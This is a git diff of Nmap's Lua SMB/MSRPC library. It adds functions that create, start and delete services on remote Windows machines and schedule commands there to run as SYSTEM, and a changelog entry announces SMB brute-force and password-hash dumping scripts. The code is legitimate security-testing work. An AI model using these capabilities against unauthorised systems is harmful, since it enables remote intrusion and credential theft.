diff --git a/CHANGELOG b/CHANGELOG
index 886e7ee8e..b662c605f 100644
--- a/CHANGELOG
+++ b/CHANGELOG
@@ -1,5 +1,14 @@
 # Nmap Changelog ($Id$); -*-text-*-
 
+o Added two new SMB/MSRPC scripts:
+    smb-brute.nse: Bruteforce to discover SMB accounts. Has advanced
+       features, such as lockout detection, username validation, 
+       username enumeration, and optimized case detection. 
+    smb-pwdump.nse: Uses executables from the Pwdump6 project to 
+       dump password hashes from a remote machine (and optionally
+       crack them with Rainbow Crack). Pwdump6 files have to be 
+       downloaded separately
+
 o Fixed the install-zenmap make target for Solaris portability.
   Solaris /bin/sh does not have test(1) -e. [Daniel Roethlisberger]
 
diff --git a/nselib/msrpc.lua b/nselib/msrpc.lua
index 71e923fa2..ea59a9e28 100644
--- a/nselib/msrpc.lua
+++ b/nselib/msrpc.lua
@@ -75,6 +75,16 @@ WINREG_PATH     = "\\winreg"
 WINREG_UUID     = string.char(0x01, 0xd0, 0x8c, 0x33, 0x44, 0x22, 0xf1, 0x31, 0xaa, 0xaa, 0x90, 0x00, 0x38, 0x00, 0x10, 0x03)
 WINREG_VERSION  = 1
 
+-- The path, UUID, and version for SVCCTL
+SVCCTL_PATH    = "\\svcctl"
+SVCCTL_UUID    = string.char(0x81, 0xbb, 0x7a, 0x36, 0x44, 0x98, 0xf1, 0x35, 0xad, 0x32, 0x98, 0xf0, 0x38, 0x00, 0x10, 0x03)
+SVCCTL_VERSION = 2
+
+-- The path, UUID, and version for ATSVC
+ATSVC_PATH     = "\\atsvc"
+ATSVC_UUID     = string.char(0x82, 0x06, 0xf7, 0x1f, 0x51, 0x0a, 0xe8, 0x30, 0x07, 0x6d, 0x74, 0x0b, 0xe8, 0xce, 0xe9, 0x8b)
+ATSVC_VERSION  = 1
+
 -- This is the only transfer syntax I've seen in the wild, not that I've looked hard. It seems to work well. 
 TRANSFER_SYNTAX = string.char(0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60)
 
@@ -111,48 +121,11 @@ local LSA_MINEMPTY = 10
 --
 --@param host The host object. 
 --@param path The path to the named pipe; for example, msrpc.SAMR_PATH or msrpc.SRVSVC_PATH. 
+--@param disable_extended [optional] If set to 'true', disables extended security negotiations. 
 --@return (status, smbstate) if status is false, smbstate is an error message. Otherwise, smbstate is
 --        required for all further calls. 
-function start_smb(host, path)
-	local smbstate
-	local status, err
-
-	-- Begin the SMB session
-    status, smbstate = smb.start(host)
-    if(status == false) then
-        return false, smbstate
-    end
-
-	-- Negotiate the protocol
-    status, err = smb.negotiate_protocol(smbstate)
-    if(status == false) then
-        smb.stop(smbstate)   
-        return false, err
-    end
-
-    -- Start up a null session
-    status, err = smb.start_session(smbstate)
-    if(status == false) then
-        smb.stop(smbstate)   
-        return false, err
-    end
-
-    -- Connect to IPC$ share
-    status, err = smb.tree_connect(smbstate, "IPC$")
-    if(status == false) then
-        smb.stop(smbstate)   
-        return false, err
-    end
-
-    -- Try to connect to requested pipe
-    status, err = smb.create_file(smbstate, path)
-    if(status == false) then
-        smb.stop(smbstate)   
-        return false, err
-    end
-
-	-- Return everything
-	return true, smbstate
+function start_smb(host, path, disable_extended)
+	return smb.start_ex(host, true, true, "IPC$", path, disable_extended)
 end
 
 --- A wrapper around the <code>smb.stop</code> function. I only created it to add symmetry, so client code
@@ -336,7 +309,7 @@ local function call_function(smbstate, opnum, arguments)
 				0x18 + string.len(arguments), -- Frag length (0x18 = the size of this data)
 				0x0000,      -- Auth length
 				0x41414141,  -- Call ID (I use 'AAAA' because it's easy to recognize)
-				0x00000100,  -- Alloc hint
+				0x00000038,  -- Alloc hint
 				0x0000,      -- Context ID
 				opnum,       -- Opnum
 				arguments
@@ -1827,7 +1800,7 @@ function winreg_enumkey(smbstate, handle, index, name)
 --		[in,out,ref]    winreg_StringBuf *name,
 	-- NOTE: if the 'name' parameter here is set to 'nil', the service on a fully patched Windows 2000 system
 	-- may crash. 
-	arguments = arguments .. msrpctypes.marshall_winreg_StringBuf({name=nil}, 520)
+	arguments = arguments .. msrpctypes.marshall_winreg_StringBuf({name=""}, 520)
 
 --		[in,out,unique] winreg_StringBuf *keyclass,
 	arguments = arguments .. msrpctypes.marshall_winreg_StringBuf_ptr({name=nil})
@@ -1952,7 +1925,7 @@ function winreg_queryinfokey(smbstate, handle)
 	arguments = msrpctypes.marshall_policy_handle(handle)
 
 --		[in,out,ref] winreg_String *classname,
-	arguments = arguments .. msrpctypes.marshall_winreg_String("", 2048)
+	arguments = arguments .. msrpctypes.marshall_winreg_String({name=""}, 2048)
 
 --		[out,ref] uint32 *num_subkeys,
 --		[out,ref] uint32 *max_subkeylen,
@@ -2082,8 +2055,10 @@ function winreg_queryvalue(smbstate, handle, value)
 			_, result['value'] = msrpctypes.unicode_to_string(result['data'], 1, #result['data'] / 2)
 		elseif(result['type'] == "REG_BINARY") then
 			result['value'] = result['data']
+		elseif(result['type'] == "REG_NONE") then
+			result['value'] = ""
 		else
-			stdnse.print_debug("MSRPC ERROR: Unknown type: %s\n\n", result['type'])
+			stdnse.print_debug("MSRPC ERROR: Unknown type: %s", result['type'])
 			result['value'] = result['type']
 		end
 	else
@@ -2154,6 +2129,592 @@ function winreg_closekey(smbstate, handle)
 	return true, result
 end
 
+--- Calls the function <code>OpenSCManagerA</code>, which gets a handle to the service manager. Should be closed with
+-- <code>CloseServiceHandle</code> when finished. 
+--
+--@param smbstate    The SMB state table
+--@param machinename The name or IP of the machine. 
+--@return (status, result) If status is false, result is an error message. Otherwise, result is a table of values
+--        representing the "out" parameters.  
+function svcctl_openscmanagera(smbstate, machinename)
+	local i, j
+	local status, result
+	local arguments
+	local pos, align
+
+	stdnse.print_debug(2, "MSRPC: Calling OpenSCManagerA() [%s]", smbstate['ip'])
+
+--        [in] [string,charset(UTF16)] uint16 *MachineName,
+	arguments = msrpctypes.marshall_ascii_ptr("\\\\" .. machinename)
+
+--        [in] [string,charset(UTF16)] uint16 *DatabaseName,
+	arguments = arguments .. msrpctypes.marshall_ascii_ptr(nil)
+
+--        [in] uint32 access_mask,
+--	arguments = arguments .. msrpctypes.marshall_int32(0x000f003f) 
+	arguments = arguments .. msrpctypes.marshall_int32(0x00000002) 
+
+--        [out,ref] policy_handle *handle
+
+	-- Do the call
+	status, result = call_function(smbstate, 0x1b, arguments)
+	if(status ~= true) then
+		return false, result
+	end
+
+	stdnse.print_debug(3, "MSRPC: OpenSCManagerA() returned successfully")
+
+	-- Make arguments easier to use
+	arguments = result['arguments']
+	pos = 1
+
+--        [in] [string,charset(UTF16)] uint16 *MachineName,
+--        [in] [string,charset(UTF16)] uint16 *DatabaseName,
+--        [in] uint32 access_mask,
+--        [out,ref] policy_handle *handle
+	pos, result['handle'] = msrpctypes.unmarshall_policy_handle(arguments, pos)
+
+	pos, result['return'] = msrpctypes.unmarshall_int32(arguments, pos)
+	if(result['return'] == nil) then
+		return false, "Read off the end of the packet (svcctl.openscmanagera)"
+	end
+	if(result['return'] ~= 0) then
+		return false, smb.get_status_name(result['return']) .. " (svcctl.openscmanagera)"
+	end
+
+	return true, result
+end
+
+
+--- Calls the function <code>OpenSCManagerW</code>, which gets a handle to the service manager. Should be closed with
+-- <code>CloseServiceHandle</code> when finished. 
+--
+--@param smbstate    The SMB state table
+--@param machinename The name or IP of the machine. 
+--@return (status, result) If status is false, result is an error message. Otherwise, result is a table of values
+--        representing the "out" parameters.  
+function svcctl_openscmanagerw(smbstate, machinename)
+	local i, j
+	local status, result
+	local arguments
+	local pos, align
+
+--	if(1 == 1) then
+--		return svcctl_openscmanagera(smbstate, machinename)
+--	end
+
+	stdnse.print_debug(2, "MSRPC: Calling OpenSCManagerW() [%s]", smbstate['ip'])
+
+--        [in] [string,charset(UTF16)] uint16 *MachineName,
+	arguments = msrpctypes.marshall_unicode_ptr("\\\\" .. machinename, true)
+
+--        [in] [string,charset(UTF16)] uint16 *DatabaseName,
+	arguments = arguments .. msrpctypes.marshall_unicode_ptr(nil, true)
+
+--        [in] uint32 access_mask,
+	arguments = arguments .. msrpctypes.marshall_int32(0x000f003f) 
+--	arguments = arguments .. msrpctypes.marshall_int32(0x00000002) 
+
+--        [out,ref] policy_handle *handle
+
+	-- Do the call
+	status, result = call_function(smbstate, 0x0f, arguments)
+	if(status ~= true) then
+		return false, result
+	end
+
+	stdnse.print_debug(3, "MSRPC: OpenSCManagerW() returned successfully")
+
+	-- Make arguments easier to use
+	arguments = result['arguments']
+	pos = 1
+
+--        [in] [string,charset(UTF16)] uint16 *MachineName,
+--        [in] [string,charset(UTF16)] uint16 *DatabaseName,
+--        [in] uint32 access_mask,
+--        [out,ref] policy_handle *handle
+	pos, result['handle'] = msrpctypes.unmarshall_policy_handle(arguments, pos)
+
+	pos, result['return'] = msrpctypes.unmarshall_int32(arguments, pos)
+	if(result['return'] == nil) then
+		return false, "Read off the end of the packet (svcctl.openscmanagerw)"
+	end
+	if(result['return'] ~= 0) then
+		return false, smb.get_status_name(result['return']) .. " (svcctl.openscmanagerw)"
+	end
+
+	return true, result
+end
+
+
+--- Calls the function <code>CloseServiceHandle</code>, which releases a handle.
+--
+--@param smbstate  The SMB state table
+--@param handle    The handle to be closed. 
+--@return (status, result) If status is false, result is an error message. Otherwise, result is a table of values
+--        representing the "out" parameters.  
+function svcctl_closeservicehandle(smbstate, handle)
+	local i, j
+	local status, result
+	local arguments
+	local pos, align
+
+	stdnse.print_debug(2, "MSRPC: Calling CloseServiceHandle() [%s]", smbstate['ip'])
+
+--        [in,out,ref] policy_handle *handle
+	arguments = msrpctypes.marshall_policy_handle(handle)
+
+
+	-- Do the call
+	status, result = call_function(smbstate, 0x00, arguments)
+	if(status ~= true) then
+		return false, result
+	end
+
+	stdnse.print_debug(3, "MSRPC: OpenSCManagerA() returned successfully")
+
+	-- Make arguments easier to use
+	arguments = result['arguments']
+	pos = 1
+
+--        [in,out,ref] policy_handle *handle
+	pos, result['handle'] = msrpctypes.unmarshall_policy_handle(arguments, pos)
+
+	pos, result['return'] = msrpctypes.unmarshall_int32(arguments, pos)
+	if(result['return'] == nil) then
+		return false, "Read off the end of the packet (svcctl.closeservicehandle)"
+	end
+	if(result['return'] ~= 0) then
+		return false, smb.get_status_name(result['return']) .. " (svcctl.closeservicehandle)"
+	end
+
+	return true, result
+end
+
+--- Calls the function <code>CreateServiceW</code>, which creates a service on the remote machine. This should
+-- be deleted with <code>DeleteService</code> when finished. 
+--
+--@param smbstate  The SMB state table
+--@param handle    The handle created by <code>OpenSCManagerW</code>
+--@return (status, result) If status is false, result is an error message. Otherwise, result is a table of values
+--        representing the "out" parameters.  
+function svcctl_createservicew(smbstate, handle, service_name, display_name, path)
+	local i, j
+	local status, result
+	local arguments
+	local pos, align
+
+	stdnse.print_debug(2, "MSRPC: Calling CreateServiceW() [%s]", smbstate['ip'])
+
+--        [in,ref] policy_handle *scmanager_handle,
+	arguments = msrpctypes.marshall_policy_handle(handle)
+
+--        [in] [string,charset(UTF16)] uint16 ServiceName[],
+	arguments = arguments .. msrpctypes.marshall_unicode(service_name, true)
+
+--        [in] [string,charset(UTF16)] uint16 *DisplayName,
+	arguments = arguments .. msrpctypes.marshall_unicode_ptr(display_name, true)
+
+--        [in] uint32 desired_access,
+	arguments = arguments .. msrpctypes.marshall_int32(0x000f01ff) -- Access: Max
+
+--        [in] uint32 type,
+	arguments = arguments .. msrpctypes.marshall_int32(0x00000010) -- Type: own process
+
+--        [in] uint32 start_type,
+	arguments = arguments .. msrpctypes.marshall_int32(0x00000003) -- Start: Demand
+
+--        [in] uint32 error_control,
+	arguments = arguments .. msrpctypes.marshall_int32(0x00000000) -- Error: Ignore
+
+--        [in] [string,charset(UTF16)] uint16 binary_path[],
+	arguments = arguments .. msrpctypes.marshall_unicode(path, true)
+
+--        [in] [string,charset(UTF16)] uint16 *LoadOrderGroupKey,
+	arguments = arguments .. msrpctypes.marshall_unicode_ptr(nil)
+
+--        [in,out] uint32 *TagId,
+	arguments = arguments .. msrpctypes.marshall_int32_ptr(nil)
+
+--        [in,size_is(dependencies_size)] uint8 *dependencies,
+	arguments = arguments .. msrpctypes.marshall_int8_ptr(nil)
+
+--        [in] uint32 dependencies_size,
+	arguments = arguments .. msrpctypes.marshall_int32(0)
+
+--        [in] [string,charset(UTF16)] uint16 *service_start_name,
+	arguments = arguments .. msrpctypes.marshall_unicode_ptr(nil)
+
+--        [in,size_is(password_size)] uint8 *password,
+	arguments = arguments .. msrpctypes.marshall_int8_ptr(nil)
+
+--        [in] uint32 password_size,
+	arguments = arguments .. msrpctypes.marshall_int32(0)
+
+--        [out,ref] policy_handle *handle
+
+
+
+	-- Do the call
+	status, result = call_function(smbstate, 0x0c, arguments)
+	if(status ~= true) then
+		return false, result
+	end
+
+	stdnse.print_debug(3, "MSRPC: CreateServiceW() returned successfully")
+
+	-- Make arguments easier to use
+	arguments = result['arguments']
+	pos = 1
+
+--        [in,ref] policy_handle *scmanager_handle,
+--        [in] [string,charset(UTF16)] uint16 ServiceName[],
+--        [in] [string,charset(UTF16)] uint16 *DisplayName,
+--        [in] uint32 desired_access,
+--        [in] uint32 type,
+--        [in] uint32 start_type,
+--        [in] uint32 error_control,
+--        [in] [string,charset(UTF16)] uint16 binary_path[],
+--        [in] [string,charset(UTF16)] uint16 *LoadOrderGroupKey,
+--        [in,out] uint32 *TagId,
+	pos, result['TagId'] = msrpctypes.unmarshall_int32_ptr(arguments, pos)
+	
+--        [in,size_is(dependencies_size)] uint8 *dependencies,
+--        [in] uint32 dependencies_size,
+--        [in] [string,charset(UTF16)] uint16 *service_start_name,
+--        [in,size_is(password_size)] uint8 *password,
+--        [in] uint32 password_size,
+--        [out,ref] policy_handle *handle
+	pos, result['handle'] = msrpctypes.unmarshall_policy_handle(arguments, pos)
+
+	pos, result['return'] = msrpctypes.unmarshall_int32(arguments, pos)
+	if(result['return'] == nil) then
+		return false, "Read off the end of the packet (svcctl.createservicew)"
+	end
+	if(result['return'] ~= 0) then
+		return false, smb.get_status_name(result['return']) .. " (svcctl.createservicew)"
+	end
+
+	return true, result
+end
+
+--- Calls the function <code>DeleteService</code>, which deletes a service on the remote machine. This service
+-- has to opened with <code>OpenServiceW</code> or similar functions. 
+--
+--@param smbstate  The SMB state table.
+--@param handle    The handle to delete, opened with <code>OpenServiceW</code> or similar. 
+--@return (status, result) If status is false, result is an error message. Otherwise, result is a table of values
+--        representing the "out" parameters.  
+function svcctl_deleteservice(smbstate, handle)
+	local i, j
+	local status, result
+	local arguments
+	local pos, align
+
+	stdnse.print_debug(2, "MSRPC: Calling DeleteService() [%s]", smbstate['ip'])
+
+--        [in,ref] policy_handle *handle
+	arguments = msrpctypes.marshall_policy_handle(handle)
+
+
+	-- Do the call
+	status, result = call_function(smbstate, 0x02, arguments)
+	if(status ~= true) then
+		return false, result
+	end
+
+	stdnse.print_debug(3, "MSRPC: DeleteService() returned successfully")
+
+	-- Make arguments easier to use
+	arguments = result['arguments']
+	pos = 1
+
+
+--        [in,ref] policy_handle *handle
+
+
+	pos, result['return'] = msrpctypes.unmarshall_int32(arguments, pos)
+	if(result['return'] == nil) then
+		return false, "Read off the end of the packet (svcctl.deleteservice)"
+	end
+	if(result['return'] ~= 0) then
+		return false, smb.get_status_name(result['return']) .. " (svcctl.deleteservice)"
+	end
+
+	return true, result
+end
+
+--- Calls the function <code>OpenServiceW</code>, which gets a handle to the service.  Should be closed with
+-- <code>CloseServiceHandle</code> when finished. 
+--
+--@param smbstate The SMB state table.
+--@param handle   A handle to the policy manager, opened with <code>OpenSCManagerW</code> or similar. 
+--@param name     The name of the service. 
+--@return (status, result) If status is false, result is an error message. Otherwise, result is a table of values
+--        representing the "out" parameters.  
+function svcctl_openservicew(smbstate, handle, name)
+	local i, j
+	local status, result
+	local arguments
+	local pos, align
+
+	stdnse.print_debug(2, "MSRPC: Calling OpenServiceW() [%s]", smbstate['ip'])
+
+--        [in,ref] policy_handle *scmanager_handle,
+	arguments = msrpctypes.marshall_policy_handle(handle)
+
+--        [in] [string,charset(UTF16)] uint16 ServiceName[],
+	arguments = arguments .. msrpctypes.marshall_unicode(name, true)
+
+--        [in] uint32 access_mask,
+	arguments = arguments .. msrpctypes.marshall_int32(0x000f01ff)
+--        [out,ref] policy_handle *handle
+
+
+	-- Do the call
+	status, result = call_function(smbstate, 0x10, arguments)
+	if(status ~= true) then
+		return false, result
+	end
+
+	stdnse.print_debug(3, "MSRPC: OpenServiceW() returned successfully")
+
+	-- Make arguments easier to use
+	arguments = result['arguments']
+	pos = 1
+
+--        [in,ref] policy_handle *scmanager_handle,
+--        [in] [string,charset(UTF16)] uint16 ServiceName[],
+--        [in] uint32 access_mask,
+--        [out,ref] policy_handle *handle
+	pos, result['handle'] = msrpctypes.unmarshall_policy_handle(arguments, pos)
+
+	pos, result['return'] = msrpctypes.unmarshall_int32(arguments, pos)
+	if(result['return'] == nil) then
+		return false, "Read off the end of the packet (svcctl.openservicew)"
+	end
+	if(result['return'] ~= 0) then
+		return false, smb.get_status_name(result['return']) .. " (svcctl.openservicew)"
+	end
+
+	return true, result
+end
+
+--- Calls the function <code>StartServiceW</code>, which starts a service. Requires a handle
+-- created by <code>OpenServiceW</code>. 
+--
+--@param smbstate The SMB state table.
+--@param handle   The handle, opened by <code>OpenServiceW</code>.
+--@param args     An array of strings representing the arguments. 
+--@return (status, result) If status is false, result is an error message. Otherwise, result is a table of values
+--        representing the "out" parameters.
+function svcctl_startservicew(smbstate, handle, args)
+	local i, j
+	local status, result
+	local arguments
+	local pos, align
+	stdnse.print_debug(2, "MSRPC: Calling StartServiceW() [%s]", smbstate['ip'])
+
+--        [in,ref] policy_handle *handle,
+	arguments = msrpctypes.marshall_policy_handle(handle)
+
+--        [in] uint32 NumArgs,
+	if(args == nil) then
+		arguments = arguments .. msrpctypes.marshall_int32(0)
+	else
+		arguments = arguments .. msrpctypes.marshall_int32(#args)
+	end
+
+--        [in/*FIXME:,length_is(NumArgs)*/] [string,charset(UTF16)] uint16 *Arguments
+	arguments = arguments .. msrpctypes.marshall_unicode_array_ptr(args, true)
+
+	-- Do the call
+	status, result = call_function(smbstate, 0x13, arguments)
+	if(status ~= true) then
+		return false, result
+	end
+
+	stdnse.print_debug(3, "MSRPC: StartServiceW() returned successfully")
+
+	-- Make arguments easier to use
+	arguments = result['arguments']
+	pos = 1
+
+--        [in,ref] policy_handle *handle,
+--        [in] uint32 NumArgs,
+--        [in/*FIXME:,length_is(NumArgs)*/] [string,charset(UTF16)] uint16 *Arguments
+
+	pos, result['return'] = msrpctypes.unmarshall_int32(arguments, pos)
+	if(result['return'] == nil) then
+		return false, "Read off the end of the packet (svcctl.startservicew)"
+	end
+	if(result['return'] ~= 0) then
+		return false, smb.get_status_name(result['return']) .. " (svcctl.startservicew)"
+	end
+
+	return true, result
+
+end
+
+--- Calls the function <code>ControlService</code>, which can send various commands to the service. 
+--
+--@param smbstate The SMB state table.
+--@param handle   The handle, opened by <code>OpenServiceW</code>.
+--@param control  The command to send. See <code>svcctl_ControlCode</code> in <code>msrpctypes.lua</code>. 
+--@return (status, result) If status is false, result is an error message. Otherwise, result is a table of values
+--        representing the "out" parameters.
+function svcctl_controlservice(smbstate, handle, control)
+	local i, j
+	local status, result
+	local arguments
+	local pos, align
+
+	stdnse.print_debug(2, "MSRPC: Calling ControlService() [%s]", smbstate['ip'])
+
+--        [in,ref] policy_handle *handle,
+	arguments = msrpctypes.marshall_policy_handle(handle)
+
+--        [in] uint32 control,
+	arguments = arguments .. msrpctypes.marshall_svcctl_ControlCode(control)
+
+--        [out,ref] SERVICE_STATUS *service_status
+
+
+	-- Do the call
+	status, result = call_function(smbstate, 0x01, arguments)
+	if(status ~= true) then
+		return false, result
+	end
+
+	stdnse.print_debug(3, "MSRPC: ControlService() returned successfully")
+
+	-- Make arguments easier to use
+	arguments = result['arguments']
+	pos = 1
+
+--        [in,ref] policy_handle *handle,
+--        [in] uint32 control,
+--        [out,ref] SERVICE_STATUS *service_status
+	pos, result['service_status'] = msrpctypes.unmarshall_SERVICE_STATUS(arguments, pos)
+
+	pos, result['return'] = msrpctypes.unmarshall_int32(arguments, pos)
+	if(result['return'] == nil) then
+		return false, "Read off the end of the packet (svcctl.controlservice)"
+	end
+	if(result['return'] ~= 0) then
+		return false, smb.get_status_name(result['return']) .. " (svcctl.controlservice)"
+	end
+
+	return true, result
+
+end
+
+
+--- Calls the function <code>QueryServiceStatus</code>, which gets the state information about the service. 
+--
+--@param smbstate The SMB state table.
+--@param handle   The handle, opened by <code>OpenServiceW</code>.
+--@return (status, result) If status is false, result is an error message. Otherwise, result is a table of values
+--        representing the "out" parameters.
+function svcctl_queryservicestatus(smbstate, handle, control)
+	local i, j
+	local status, result
+	local arguments
+	local pos, align
+
+	stdnse.print_debug(2, "MSRPC: Calling QueryServiceStatus() [%s]", smbstate['ip'])
+
+--        [in,ref] policy_handle *handle,
+	arguments = msrpctypes.marshall_policy_handle(handle)
+
+--        [out,ref] SERVICE_STATUS *service_status
+
+
+	-- Do the call
+	status, result = call_function(smbstate, 0x06, arguments)
+	if(status ~= true) then
+		return false, result
+	end
+
+	stdnse.print_debug(3, "MSRPC: QueryServiceStatus() returned successfully")
+
+	-- Make arguments easier to use
+	arguments = result['arguments']
+	pos = 1
+
+--        [in,ref] policy_handle *handle,
+--        [out,ref] SERVICE_STATUS *service_status
+	pos, result['service_status'] = msrpctypes.unmarshall_SERVICE_STATUS(arguments, pos)
+
+	pos, result['return'] = msrpctypes.unmarshall_int32(arguments, pos)
+	if(result['return'] == nil) then
+		return false, "Read off the end of the packet (svcctl.queryservicestatus)"
+	end
+	if(result['return'] ~= 0) then
+		return false, smb.get_status_name(result['return']) .. " (svcctl.queryservicestatus)"
+	end
+
+	return true, result
+end
+
+---Calls the function <code>JobAdd</code>, which schedules a process to be run on the remote 
+-- machine. This requires administrator privileges to run, and the command itself runs as
+-- SYSTEM. 
+--@param smbstate The SMB state table.
+--@param server   The IP or Hostname of the server (seems to be ignored but it's a good idea to have it)
+--@param command  The command to run on the remote machine. The appropriate file(s) already 
+--                have to be there, and this should be a full path. 
+--@param time     (optional) The time at which to run the command. Default: 5 seconds from 
+--                when the user logged in. 
+function atsvc_jobadd(smbstate, server, command, time)
+	local i, j
+	local status, result
+	local arguments
+	local pos, align
+
+	-- Set up the time
+	if(time == nil) then
+		-- TODO
+	end
+
+	stdnse.print_debug(2, "MSRPC: Calling AddJob(%s) [%s]", command, smbstate['ip'])
+
+--        [in,unique,string,charset(UTF16)] uint16 *servername,
+	arguments = msrpctypes.marshall_unicode_ptr(server, true)
+
+--        [in] atsvc_JobInfo *job_info,
+	arguments = arguments .. msrpctypes.marshall_atsvc_JobInfo(command, time)
+--        [out,ref]    uint32 *job_id
+
+
+	-- Do the call
+	status, result = call_function(smbstate, 0x00, arguments)
+	if(status ~= true) then
+		return false, result
+	end
+
+	stdnse.print_debug(3, "MSRPC: AddJob() returned successfully")
+
+	-- Make arguments easier to use
+	arguments = result['arguments']
+	pos = 1
+
+--        [in,unique,string,charset(UTF16)] uint16 *servername,
+--        [in] atsvc_JobInfo *job_info,
+--        [out,ref]    uint32 *job_id
+	pos, result['job_id'] = msrpctypes.unmarshall_int32(arguments, pos)
+
+	pos, result['return'] = msrpctypes.unmarshall_int32(arguments, pos)
+	if(result['return'] == nil) then
+		return false, "Read off the end of the packet (atsvc.addjob())"
+	end
+	if(result['return'] ~= 0) then
+		return false, smb.get_status_name(result['return']) .. " (atsvc.addjob())"
+	end
+
+	return true, result
+end
+
 ---Attempt to enumerate users using SAMR functions. 
 --
 --@param host The host object. 
@@ -2179,23 +2740,23 @@ function samr_enum_users(host)
 	local response = {}
 
 	-- Create the SMB session
-	status, smbstate = msrpc.start_smb(host, msrpc.SAMR_PATH)
+	status, smbstate = start_smb(host, SAMR_PATH, true)
 
 	if(status == false) then
 		return false, smbstate
 	end
 
 	-- Bind to SAMR service
-	status, bind_result = msrpc.bind(smbstate, msrpc.SAMR_UUID, msrpc.SAMR_VERSION, nil)
+	status, bind_result = bind(smbstate, SAMR_UUID, SAMR_VERSION, nil)
 	if(status == false) then
-		msrpc.stop_smb(smbstate)
+		stop_smb(smbstate)
 		return false, bind_result
 	end
 
 	-- Call connect4()
-	status, connect4_result = msrpc.samr_connect4(smbstate, host.ip)
+	status, connect4_result = samr_connect4(smbstate, host.ip)
 	if(status == false) then
-		msrpc.stop_smb(smbstate)
+		stop_smb(smbstate)
 		return false, connect4_result
 	end
 
@@ -2203,15 +2764,15 @@ function samr_enum_users(host)
 	connect_handle = connect4_result['connect_handle']
 
 	-- Call EnumDomains()
-	status, enumdomains_result = msrpc.samr_enumdomains(smbstate, connect_handle)
+	status, enumdomains_result = samr_enumdomains(smbstate, connect_handle)
 	if(status == false) then
-		msrpc.stop_smb(smbstate)
+		stop_smb(smbstate)
 		return false, enumdomains_result
 	end
 
 	-- If no domains were returned, go back with an error
 	if(#enumdomains_result['sam']['entries'] == 0) then
-		msrpc.stop_smb(smbstate)
+		stop_smb(smbstate)
 		return false, "Couldn't find any domains"
 	end
 
@@ -2226,9 +2787,9 @@ function samr_enum_users(host)
 			local opendomain_result, querydisplayinfo_result
 
 			-- Call LookupDomain()
-			status, lookupdomain_result = msrpc.samr_lookupdomain(smbstate, connect_handle, domain)
+			status, lookupdomain_result = samr_lookupdomain(smbstate, connect_handle, domain)
 			if(status == false) then
-				msrpc.stop_smb(smbstate)
+				stop_smb(smbstate)
 				return false, lookupdomain_result
 			end
 
@@ -2236,9 +2797,9 @@ function samr_enum_users(host)
 			sid = lookupdomain_result['sid']
 	
 			-- Call OpenDomain()
-			status, opendomain_result = msrpc.samr_opendomain(smbstate, connect_handle, sid)
+			status, opendomain_result = samr_opendomain(smbstate, connect_handle, sid)
 			if(status == false) then
-				msrpc.stop_smb(smbstate)
+				stop_smb(smbstate)
 				return false, opendomain_result
 			end
 
@@ -2249,9 +2810,9 @@ function samr_enum_users(host)
 			j = 0
 			repeat
 				-- Call QueryDisplayInfo()
-				status, querydisplayinfo_result = msrpc.samr_querydisplayinfo(smbstate, domain_handle, j, SAMR_GROUPSIZE)
+				status, querydisplayinfo_result = samr_querydisplayinfo(smbstate, domain_handle, j, SAMR_GROUPSIZE)
 				if(status == false) then
-					msrpc.stop_smb(smbstate)
+					stop_smb(smbstate)
 					return false, querydisplayinfo_result
 				end
 
@@ -2275,7 +2836,7 @@ function samr_enum_users(host)
 
 						-- Convert each element in the 'flags' array into the equivalent string
 						for l = 1, #array['flags'], 1 do
-							array['flags'][l] = msrpc.samr_AcctFlags_tostr(array['flags'][l])
+							array['flags'][l] = samr_AcctFlags_tostr(array['flags'][l])
 						end
 	
 						-- Add it to the array
@@ -2286,15 +2847,15 @@ function samr_enum_users(host)
 			until querydisplayinfo_result['return'] == 0
 
 			-- Close the domain handle
-			msrpc.samr_close(smbstate, domain_handle)
+			samr_close(smbstate, domain_handle)
 		end -- Checking for 'builtin'
 	end -- Domain loop
 
 	-- Close the connect handle
-	msrpc.samr_close(smbstate, connect_handle)
+	samr_close(smbstate, connect_handle)
 
 	-- Stop the SAMR SMB
-	msrpc.stop_smb(smbstate)
+	stop_smb(smbstate)
 
 	stdnse.print_debug(3, "Leaving enum_samr()")
 
@@ -2320,28 +2881,35 @@ function lsa_enum_users(host)
 	stdnse.print_debug(3, "Entering enum_lsa()")
 
 	-- Create the SMB session
-	status, smbstate = msrpc.start_smb(host, msrpc.LSA_PATH)
+	status, smbstate = start_smb(host, LSA_PATH, true)
 	if(status == false) then
 		return false, smbstate
 	end
 
 	-- Bind to LSA service
-	status, bind_result = msrpc.bind(smbstate, msrpc.LSA_UUID, msrpc.LSA_VERSION, nil)
+	status, bind_result = bind(smbstate, LSA_UUID, LSA_VERSION, nil)
 	if(status == false) then
-		msrpc.stop_smb(smbstate)
+		stop_smb(smbstate)
 		return false, bind_result
 	end
 
 	-- Open the LSA policy
-	status, openpolicy2_result = msrpc.lsa_openpolicy2(smbstate, host.ip)
+	status, openpolicy2_result = lsa_openpolicy2(smbstate, host.ip)
 	if(status == false) then
-		msrpc.stop_smb(smbstate)
+		stop_smb(smbstate)
 		return false, openpolicy2_result
 	end
 
 	-- Start with some common names, as well as the name returned by the negotiate call
 	-- Vista doesn't like a 'null' after the server name, so fix that (TODO: the way I strip the null here feels hackish, is there a better way?)
-	names = {"administrator", "guest", "test", smbstate['domain'], string.sub(smbstate['server'], 1, #smbstate['server'] - 1) }
+	names = {"administrator", "guest", "test"}
+	-- These aren't always sent back (especially with 'extended security')
+	if(smbstate['domain'] ~= nil) then
+		names[#names + 1] = smbstate['domain']
+	end
+	if(smbstate['server'] ~= nil) then
+		names[#names + 1] = string.sub(smbstate['server'], 1, #smbstate['server'] - 1) 
+	end
 
 	-- Get the server's name from nbstat
 	local result, server_name = netbios.get_server_name(host.ip)
@@ -2356,9 +2924,9 @@ function lsa_enum_users(host)
 	end
 
 	-- Look up the names, if any are valid than the server's SID will be returned
-	status, lookupnames2_result = msrpc.lsa_lookupnames2(smbstate, openpolicy2_result['policy_handle'], names)
+	status, lookupnames2_result = lsa_lookupnames2(smbstate, openpolicy2_result['policy_handle'], names)
 	if(status == false) then
-		msrpc.stop_smb(smbstate)
+		stop_smb(smbstate)
 		return false, lookupnames2_result
 	end
 	-- Loop through the domains returned and find the users in each
@@ -2372,7 +2940,7 @@ function lsa_enum_users(host)
 			sids[#sids + 1] = sid .. "-" .. j 
 		end
 
-		status, lookupsids2_result = msrpc.lsa_lookupsids2(smbstate, openpolicy2_result['policy_handle'], sids)
